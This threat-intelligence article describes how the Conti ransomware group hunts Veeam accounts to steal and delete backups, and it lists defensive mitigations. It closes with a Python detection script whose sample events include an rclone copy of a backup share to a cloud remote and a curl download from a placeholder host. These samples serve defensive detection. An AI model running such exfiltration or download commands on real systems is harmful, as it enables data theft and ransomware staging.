The Conti ransomware group has made headlines around the world, causing a great deal of damage during their relatively short tenure. Ransomware gangs know that having secure backups of critical files massively reduces the likelihood of a ransom payment being made, so it comes as no surprise that the rising star of the cybercrime world is targeting Veeam, the fastest-growing and most widespread backup platform for virtualized infrastructures.

In 2020 Veeam became the #2 provider worldwide in terms of overall revenue, with YoY growth more than 17.5 percentage points above the market average [2]. Likewise, Veeam had the fastest revenue growth in the worldwide Data Replication & Protection market, both sequentially (+21.5%) and YoY (+17.9%) in 2H’20, among the top 5 vendors, all other vendors combined, and the overall market average, according to the IDC Semi-annual Software Tracker, 2H20.

A recent report from ransomware incident response firm Coveware [1], based on thousands of cases investigated during Q2 2021, showed Conti V2 to be the second-most-prevalent ransomware encountered, trailing Sodinokibi, also known as REvil, by just 2.1% for the top position. Conti ransomware first appeared in late 2019 and has steadily grown to become one of the foremost ransomware-as-a-service (RaaS) operations.

Cyber groups specifically target backup solutions in order to ensure that the victim has no other option except paying the ransom. Backups are a major obstacle for any ransomware operation, as they allow the victim to resume business by performing data recovery instead of paying ransom to the criminals. Enabled backups tremendously decrease Conti’s ransom demands and can likely lead to data recovery with zero payments to the Conti collective.

Conti’s tactics are based on utilizing the skills of their network intruders, or “pentesters”, in order to target on-premise and cloud backup solutions. The Conti group is particularly methodical in developing and implementing backup removal techniques. Conti hunts for Veeam privileged users and services and leverages them to access, exfiltrate, remove and encrypt backups to ensure ransomware breaches are un-“backupable”. This way, Conti simultaneously exfiltrates the data for further victim blackmailing while leaving the victim with no chance to quickly recover their files, as the backups are removed.

Maintaining developed protocols of access rights hierarchy, network security, and password hygiene, as well as systemic network monitoring aimed at spotting abnormal network behavior, may significantly reduce the chances of Conti successfully removing backups. Secure backup solutions and the mitigations listed here will enable any potential victims to walk away from Conti without paying the demanded ransom.

To prevent attack initiation, employee training and email security protocols should be implemented. Conti uses very developed social engineering techniques in order to convince the victim employees that the targeted emails are legitimate. Sometimes Conti uses corporate VPN compromise and TrickBot delivery as an alternative means of attack initiation. Tracking externally exposed endpoints is therefore critical.

Audit and/or block command-line interpreters by using whitelisting tools like AppLocker or Software Restriction Policies, with a focus on any suspicious “curl” command and unauthorized “.msi” installer scripts, particularly those from the C:\ProgramData and C:\Temp directories.

To prevent lateral movement, network hierarchy protocols should be implemented with network segregation and decentralization.

Special security protocols, password updates, and account security measures for Veeam should be implemented to prevent Veeam account takeover. Rclone and other data exfiltration command-line activities can be captured through proper logging of process execution with command-line arguments.
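As an added example (not code from the AdvIntel post), the triage below applies the three process-level indicators the mitigations call out, rclone execution, curl invocations, and .msi installers launched from C:\ProgramData or C:\Temp, to constructed process-creation records shaped like Windows Security event 4688; the field names, sample paths and rule labels are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records in the shape of Windows Security
# event 4688 (NewProcessName + CommandLine). Not real telemetry.
SAMPLE_EVENTS = [
    {"NewProcessName": r"C:\ProgramData\rc\rclone.exe",
     "CommandLine": r"rclone.exe copy \\FS01\Backups mega:backups --transfers 16"},
    {"NewProcessName": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\ProgramData\update.msi /qn"},
    {"NewProcessName": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -o C:\Temp\a.txt http://example.invalid/x"},
    {"NewProcessName": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\admin\Downloads\7zip.msi /qn"},
    {"NewProcessName": r"C:\Program Files\Veeam\Backup\Veeam.Backup.Manager.exe",
     "CommandLine": r"Veeam.Backup.Manager.exe"},
]

# Staging directories the page singles out for unauthorized .msi installers.
SUSPECT_DIRS = ("c:\\programdata", "c:\\temp")
# Any drive-rooted path ending in .msi, quoted or not, inside a command line.
MSI_PATH = re.compile(r'"?([a-z]:\\[^"\s]+?\.msi)"?', re.IGNORECASE)
RCLONE_TOKEN = re.compile(r"\brclone(\.exe)?\b", re.IGNORECASE)


def _under_suspect_dir(path):
    p = path.lower()
    return any(p.startswith(d + "\\") for d in SUSPECT_DIRS)


def classify(event):
    """Return the list of indicator labels matched by one 4688-style event."""
    image = PureWindowsPath(event["NewProcessName"]).name.lower()
    cmd = event["CommandLine"]
    hits = []
    # Rclone: matched by image name or by the tool name in the command line,
    # which is why logging command-line arguments matters.
    if image == "rclone.exe" or RCLONE_TOKEN.search(cmd):
        hits.append("rclone-exfil")
    # .msi installer referenced from C:\ProgramData or C:\Temp.
    if any(_under_suspect_dir(m) for m in MSI_PATH.findall(cmd)):
        hits.append("msi-from-staging-dir")
    # Every curl invocation is surfaced for audit, as the page recommends.
    if image == "curl.exe":
        hits.append("curl")
    return hits


def triage(events):
    """Keep only events that matched at least one indicator."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print(", ".join(hits), "<-", cmd)
```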